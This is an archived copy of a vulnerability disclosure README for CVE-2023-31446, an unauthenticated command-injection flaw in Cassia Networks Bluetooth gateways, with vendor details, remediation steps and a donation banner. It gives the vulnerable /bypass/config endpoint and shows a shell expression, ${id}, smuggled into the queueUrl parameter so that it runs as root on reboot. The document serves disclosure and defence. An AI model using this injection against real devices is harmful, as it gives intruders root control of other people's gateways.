Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-31446 PoC — Cassia Networks Gateway 安全漏洞

Source
https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution
Associated Vulnerability
Title:Cassia Networks Gateway 安全漏洞 (CVE-2023-31446)
Description:Cassia Networks Gateway是Cassia Networks公司的一个物联网网关。 Cassia Networks Gateway XC1000_2.1.1.2303082218版本、XC2000_2.1.1.2303090947版本存在安全漏洞,该漏洞源于/bypass/config中的queueUrl参数未清理。
Description
Repository contains description for CVE-2023-31446
Readme
# CVE-2023-31446-Remote-Code-Execution
Repository contains description for CVE-2023-31446 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.
___  
CVE ID: CVE-2023-31446  
Vendor: Cassia Networks    
Product: Cassia Gateway Firmware  
Version: <2.1.1.230309*
___
Vulnerability: Remote Code Execution/Remote Code Injection  
Affected: gateways  
Decription: *queueUrl* parameter in */bypass/config* is not sanitized. This leads to injecting bash code and executing it with root privileges on device startup.  
Status: Confirmed by vendor, Fixed  
Version Patched: 2.1.1.230720*
____
#### Details
Cassia has implemented in the past function that allows Gateways to push bluetooth scan data to the SQS Amazon Services.  
The settings for mentioned functionality could be set by API endpoint:
> http://<ip>/bypass/config?type=sqs&keyId=<"keyId">&key=<"keysecret">&queueUrl=<"queueServiceUrl">  

Based on the investigation the SQS feature starts the service on the boot time of the device.  
Service loads configuration file, where mentioned endpoint overwrite the settings.  
Service after loading specified URL runs nslookup from root bash perspective what allows to run any command embeded into URL parameter.  
The access to the endpoint is not authenticated by default. More of that the feature was not described in the official Cassia documentation.
____
#### Exploitation

Attacker can embed bash command ${id} into *queueUrl* parameter:
![query](img/1.png)  

After rebooting device, gateway will run the command with root privileges (look A,AAA query):
![capture](img/2.png)  

##### *Note that gateway used linux device as gateway for easier capturing network flow and evidences*
Gateway -> Default Gateway (Linux) -> Internet

#### Remediation
- Enable and require API authentication (if possible in your version)
- Monitor traffic to gateway API
- Patch to the highest possible version availaible on [Cassia Networks](https://www.cassianetworks.com/)
File Snapshot

 [4.0K]  /data/pocs/657e0132fb75c6a72f25f6923a27142b7938485a
├── [4.0K]  img
│   ├── [ 36K]  1.png
│   └── [ 90K]  2.png
└── [1.9K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.